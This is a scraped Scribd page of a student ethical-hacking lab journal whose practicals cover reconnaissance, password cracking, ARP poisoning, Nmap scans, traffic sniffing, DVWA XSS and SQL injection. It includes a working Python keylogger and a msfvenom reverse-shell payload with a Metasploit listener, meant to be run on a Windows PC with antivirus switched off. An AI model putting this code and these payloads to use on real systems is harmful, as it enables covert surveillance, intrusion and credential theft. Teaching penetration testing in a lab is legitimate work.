Scribd Logo
Upload

Welcome to Scribd!

  • 45 views

    EH Journal (2020) (E-Next - In)

    Uploaded by

    sss
    Here are the key steps: 1. Type msfconsole to open Metasploit console 2. Search for exploits using search <keyword> 3. Use the exploit with use <exploit name> 4. Set parameters of exploit with set <parameter> <value> 5. Exploit target with exploit 6. Get system shell with sessions -i <session number> 7. Post exploitation commands like sysinfo, shell etc. This provides the basic workflow in Metasploit for exploiting vulnerabilities like buffer overflows, injection flaws etc. on target systems. The practical helps students to understand penetration testing using one of the most popular exploit frameworks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    EH Journal (2020) (E-Next - In)

    Uploaded by

    sss
    45 views30 pages
    Here are the key steps: 1. Type msfconsole to open Metasploit console 2. Search for exploits using search <keyword> 3. Use the exploit with use <exploit name> 4. Set parameters of exploit with set <parameter> <value> 5. Exploit target with exploit 6. Get system shell with sessions -i <session number> 7. Post exploitation commands like sysinfo, shell etc. This provides the basic workflow in Metasploit for exploiting vulnerabilities like buffer overflows, injection flaws etc. on target systems. The practical helps students to understand penetration testing using one of the most popular exploit frameworks.

    Original Title

    EH Journal (2020) (E-next.in)

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Here are the key steps: 1. Type msfconsole to open Metasploit console 2. Search for exploits using search <keyword> 3. Use the exploit with use <exploit name> 4. Set parameters of exploit with set <parameter> <value> 5. Exploit target with exploit 6. Get system shell with sessions -i <session number> 7. Post exploitation commands like sysinfo, shell etc. This provides the basic workflow in Metasploit for exploiting vulnerabilities like buffer overflows, injection flaws etc. on target systems. The practical helps students to understand penetration testing using one of the most popular exploit frameworks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    45 views30 pages

    EH Journal (2020) (E-Next - In)

    Uploaded by

    sss
    Here are the key steps: 1. Type msfconsole to open Metasploit console 2. Search for exploits using search <keyword> 3. Use the exploit with use <exploit name> 4. Set parameters of exploit with set <parameter> <value> 5. Exploit target with exploit 6. Get system shell with sessions -i <session number> 7. Post exploitation commands like sysinfo, shell etc. This provides the basic workflow in Metasploit for exploiting vulnerabilities like buffer overflows, injection flaws etc. on target systems. The practical helps students to understand penetration testing using one of the most popular exploit frameworks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 30

    02

    Practical-1
    Aim: Use Google and Whois for Reconnaissance

    https://E-next.in
    02

    https://E-next.in
    02

    Practical-2
    Aim:
    a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
    b) Use Cain and Abel for cracking Windows account password using Dictionary attack
    and to decode wireless network passwords.

    Steps:
    1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.

    2. Plain Text

    3. To Encrypt Click on Encrypt/Decrypt > Symmetric(modern) > RC4

    4. Click the number of bits

    5. Click Encrypt.

    6. To Decrypt Again click on Encrypt/Decrypt > Symmetric(modern) > RC4

    7. Click the number of bits.

    8. Click Decrypt.

    https://E-next.in
    02

    b) Use Cain and Abel for cracking Windows account password using dictionary attack
    and to decode wireless network password.

    1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.

    2. A dialogue box appears after clicking on hash calculator,


    Add the text >> Calculate hash code >> Copy MD5 hash value

    https://E-next.in
    02

    3. Click on MD5 Hashes>> Add list>>Paste Hash Value.

    4. Click on hash code right click,Dictionary Attack>>Add to list>>Start

    https://E-next.in
    02

    Match Found: Match not Found:

    https://E-next.in
    02

    Practical-3
    Aim: a) Run and analyze the output of following commands in Linux –
    ifconfig, ping, netstat, traceroute.
    b) Perform ARP Poisoning in Windows

    a) Linux Commands:

    1. ifconfig

    2. netstat

    https://E-next.in
    02

    3. ping

    4. traceroute

    https://E-next.in
    02

    b) ARP Poisoning
    Steps:
    1) Click on Sniffer tab.

    2) Click on Start/Stop Sniffer and give range values and click okay.

    https://E-next.in
    02

    3) Right click on any IP and select Resolve Host Name.

    4) Click on ARP tab on the bottom.

    5) Click on Add Button(1) and select your router and any IP.

    https://E-next.in
    02

    6) Click on the IP and then click on the button shown in the image to start ARP
    Poisoning.

    https://E-next.in
    02

    Practical – 4
    Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
    NULL, XMAS.

    NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to
    check if it is installed properly. Now type the below commands.

     ACK -sA (TCP ACK scan)


    It never determines open (or even open|filtered) ports. It is used to map out firewall
    rulesets, determining whether they are stateful or not and which ports are filtered.

    Command: nmap -sA -T4 scanme.nmap.org

     SYN (Stealth) Scan (-sS)


    SYN scan is the default and most popular scan option for good reason. It can be
    performed quickly, scanning thousands of ports per second on a fast network not
    hampered by intrusive firewalls.

    Command: nmap -p22,113,139 scanme.nmap.org

    https://E-next.in
    02

     FIN Scan (-sF)


    Sets just the TCP FIN bit.

    Command: nmap -sF -T4 para

     NULL Scan (-sN)


    Does not set any bits (TCP flag header is 0)

    Command: nmap –sN –p 22 scanme.nmap.org

     XMAS Scan (-sX)


    Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

    Command: nmap -sX -T4 scanme.nmap.org

    https://E-next.in
    02

    Practical-5
    Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
    b) Use Nemesy to launch DoS attack

    a) Use Wireshark (Sniffer) to capture network traffic and analyze


    Steps:

    1. Open Wireshark and select your Connection.

    https://E-next.in
    02

    2. Open any http website and add display filter as http.

    3. Right Click on the POST method >> Follow >> TCP stream.

    https://E-next.in
    02

    4. Search for ‘credentials’ in the dialog box.

    https://E-next.in
    02

    Practical – 6
    Aim: Simulate persistent cross-site scripting attack.

    Steps:
    1. Extract the DVWA zip file.
    2. Copy the folder and paste it in Drive C: > xampp > htdocs
    3. Rename the file as DVWA.
    4. Go in the config file and rename the file as config.inc.php
    5. Open chrome and search localhost/DVWA.
    6. Click on create/reset database. The database will be created. Click on login.

    7. Username = “Admin” and Password = “password”. Click on login.

    https://E-next.in
    02

    8. Click on DVWA security and set the security to low.

    9. Click on XSS (Stored) write the script and click on sign guestbook. The script will be
    executed whenever the page is reloaded.

    https://E-next.in
    02

    https://E-next.in
    02

    Practical – 7
    Aim: Session impersonation using Firefox and Tamper Data add-on.
    Steps:
    1. Open Firefox
    2. Go to tools > Add on > Extension
    3. Search and install Temper Data.
    4. Go to facebook login page.
    5. Now click on tamper add on and start tampering the data.
    6. Now enter the username and password in the facebook login page.
    7. Your username and password is been captured using session impersonation.

    https://E-next.in
    02

    8. Select a website for tempering data e.g(razorba).

    9. Select any item to buy


    10. Then click on add-cart
    11. Then click on TemperData(add-on)

    https://E-next.in
    02

    12. Refresh the page to get the extension.

    13. Click on OK.

    https://E-next.in
    02

    14. Change values in Cookie option for tempering the DATA.

    15. Then click on OK and see the Data has been Tempered.

    https://E-next.in
    02

    Practical – 8
    Aim: Perform SQL injection attack.
    Steps:
    1. Extract the DVWA zip file.
    2. Copy the folder and paste it in Drive C: > xampp > htdocs
    3. Rename the file as DVWA.
    4. Go in the config file and rename the file as config.inc.php
    5. Open chrome and search localhost/DVWA.
    6. Click on create/reset database. The database will be created. Click on login.

    7. Username = “Admin” and Password = “password”. Click on login.

    https://E-next.in
    02

    8. Click on DVWA security and set the security to low.

    9. Click on SQL Injection.


    10. In User Id enter 1 and click on submit.

    https://E-next.in
    02

    11. Type 1’ or tue;# and click on submit.

    https://E-next.in
    02

    Practical – 9
    Aim: Create a simple keylogger using python
    Code:
    from pynput.keyboard import Key, Listener
    import logging
    # if no name it gets into an empty string
    log_dir = ""
    # This is a basic logging function
    logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
    format='%(asctime)s:%(message)s:')
    # This is from the library
    def on_press(key):
    logging.info(str(key))
    # This says, listener is on
    with Listener(on_press=on_press) as listener:
    listener.join()

    Output:

    https://E-next.in
    02

    Practical – 10
    Aim: Using Metasploit to exploit (Kali Linux).

    Steps:
    Boot kali linux in pendrive and open it in PC.
    Open metasploit and type exit command to quit.
    The directory will change to root@kali.
    Type the following command.

    1. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp


    LHOST=192.168.9.191 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o
    /tmp/1.exe
    2. msfconsole
    3. use exploit/multi/handler
    4. msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
    5. payload => windows/shell/reverse_tcp
    6. Show options
    7. msf exploit(multi/handler) > set LHOST 192.168.9.191
    8. LHOST => 192.168.9.191
    9. msf exploit(multi/handler) > set LPORT 31337
    10. LPORT => 31337
    11. msf exploit(multi/handler) > exploit

    PUT THE PAYLOAD GENEREATED IN A WINDOWS PC (MAKE SURE ANTIVIRUS


    IS OFF) AND RUN THE EXE FILE.

    https://E-next.in
    02

    https://E-next.in
    02

    https://E-next.in

    You might also like